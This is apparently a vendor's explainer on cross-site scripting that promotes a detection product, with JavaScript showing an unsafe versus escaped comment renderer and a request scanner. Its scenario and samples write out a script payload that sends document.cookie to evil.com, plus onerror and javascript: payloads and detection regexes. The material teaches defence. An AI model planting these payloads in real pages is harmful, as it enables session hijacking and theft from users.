XSS lets an attacker inject JavaScript into your web application that then runs in the browsers of other users. This can steal session cookies, capture keystrokes, redirect victims to phishing pages, or perform actions on their behalf — all silently, while the user thinks they are on your legitimate site.
Think of it this way
Imagine a notice board where anyone can post a message. An attacker pins a note that, when read by anyone walking past, hypnotises them and sends their wallet to the attacker. XSS is like that — your page is the notice board, the attacker's script is the hypnotic note, and your users are the victims.
An attacker finds a place in your app where user-submitted content is displayed without sanitisation — a comment field, a product review, a username. They submit content containing a `<script>` tag or an event handler like `<img onerror=...>`. When other users load the page, the browser executes the malicious script as if it came from your trusted domain, giving the attacker access to the user's session.
Scenario 1
An attacker posts a comment containing `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` on a forum. Every user who views that comment has their session cookie sent to the attacker, who then uses it to log in as them.
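To make the mechanism above concrete, here is an added example (not code from the original page and not Anomira's) showing a comment renderer with the stored-XSS defect beside its fix. It is plain Node.js with no dependencies; the sample comment is constructed and carries the payload quoted in Scenario 1, and the function names are my own.

```javascript
// Added example, not from the original page or from Anomira: a forum comment
// renderer, first as written with the stored-XSS defect, then hardened.

// Constructed sample comment: the exact payload quoted in Scenario 1 above.
const STORED_COMMENT =
  "Nice post! <script>document.location='https://evil.com/steal?c='+document.cookie</script>";

// VULNERABLE: user content is concatenated straight into the HTML. Whatever
// the attacker stored is emitted as live markup, so every viewer's browser
// executes it with the forum's origin.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Encode the five characters that can change HTML context. This is the
// minimal, context-correct encoding for text placed inside an element body
// or a double-quoted attribute value (other contexts, such as inside a
// <script> block or a URL, need their own encoders).
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// HARDENED: same template, but the user-controlled part is encoded at the
// point of output. The payload survives only as visible text.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Cheap self-check used here to show the difference: does the rendered HTML
// still contain a script element or an inline event-handler attribute inside
// a tag? (A heuristic for this demo, not a substitute for a real HTML parser.)
function containsLiveScript(html) {
  return /<\s*script\b/i.test(html) || /<[^>]*\son\w+\s*=/i.test(html);
}

console.log("unsafe render executes script:", containsLiveScript(renderCommentUnsafe(STORED_COMMENT))); // true
console.log("safe render executes script:  ", containsLiveScript(renderCommentSafe(STORED_COMMENT)));   // false
```

The fix is output encoding at the moment the value is written into HTML, not input filtering: the comment is stored unchanged, and the same stored value becomes harmless text because the renderer never lets it change context.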
Scenario 2
A stored XSS payload on a banking portal's transaction notes field captures every keystroke made by bank administrators, including passwords and private customer data viewed during support sessions.
Anomira looks for common XSS payloads in API request bodies and parameters — script tags, JavaScript event handlers, encoded variants — and flags them before they reach your database or response pipeline.
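The kind of request-side check described above, as an added example that is not Anomira's code or from the original page: a small scanner that normalises URL- and HTML-entity encoding in request parameters and bodies, then matches three common XSS indicators (script tags, inline event handlers, `javascript:` URIs). The request objects, field names and indicator names are constructed for the demo.

```javascript
// Added example, not Anomira's implementation: scan API request parameters
// and bodies for common XSS indicators after undoing the encodings attackers
// use to hide them.

const XSS_INDICATORS = [
  { name: "script-tag",     re: /<\s*script\b/i },
  { name: "event-handler",  re: /<[^>]*\son\w+\s*=/i },
  { name: "javascript-uri", re: /javascript\s*:/i },
];

// Guard against out-of-range numeric entities, which would make fromCodePoint throw.
function codePoint(n) {
  return n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "";
}

// Peel off up to three layers of percent-encoding, then decode HTML numeric
// and the common named entities. Over-decoding is acceptable for a detector;
// it is not acceptable for the code that renders the value.
function normalise(input) {
  let s = String(input);
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(s); } catch (e) { break; } // malformed %xx: stop
    if (next === s) break;
    s = next;
  }
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => codePoint(parseInt(d, 10)))
    .replace(/&lt;/gi, "<").replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"').replace(/&amp;/gi, "&");
}

// Return the names of every indicator that fires on one field value.
function scanForXss(value) {
  const normalised = normalise(value);
  return XSS_INDICATORS.filter((i) => i.re.test(normalised)).map((i) => i.name);
}

// Walk a request's query parameters and body fields; report where each hit was found.
function scanRequest(req) {
  const findings = [];
  for (const [field, value] of Object.entries(req.params || {})) {
    for (const hit of scanForXss(value)) findings.push({ where: `param:${field}`, indicator: hit });
  }
  for (const [field, value] of Object.entries(req.body || {})) {
    for (const hit of scanForXss(value)) findings.push({ where: `body:${field}`, indicator: hit });
  }
  return findings;
}

// Constructed sample requests: the Scenario 1 payload as-is, a URL-encoded
// image/onerror payload in a query parameter, an entity-encoded javascript:
// link in a body field, and a benign comment that merely mentions "script".
const SAMPLE_REQUESTS = [
  { id: 1, body: { comment: "<script>document.location='https://evil.com/steal?c='+document.cookie</script>" } },
  { id: 2, params: { q: "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" } },
  { id: 3, body: { note: "&lt;a href=&quot;javascript:alert(1)&quot;&gt;x&lt;/a&gt;" } },
  { id: 4, body: { comment: "I wrote the script for the play; no error on stage." } },
];

for (const req of SAMPLE_REQUESTS) {
  console.log(`request ${req.id}:`, JSON.stringify(scanRequest(req)));
}
```

Running it flags requests 1 to 3 (one indicator each) and reports nothing for request 4. The normalisation step is what makes the encoded variants visible; a detector that only looks at the raw bytes would miss requests 2 and 3.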
See this attack in your live API traffic
Anomira detects cross-site scripting (XSS) automatically — no configuration needed.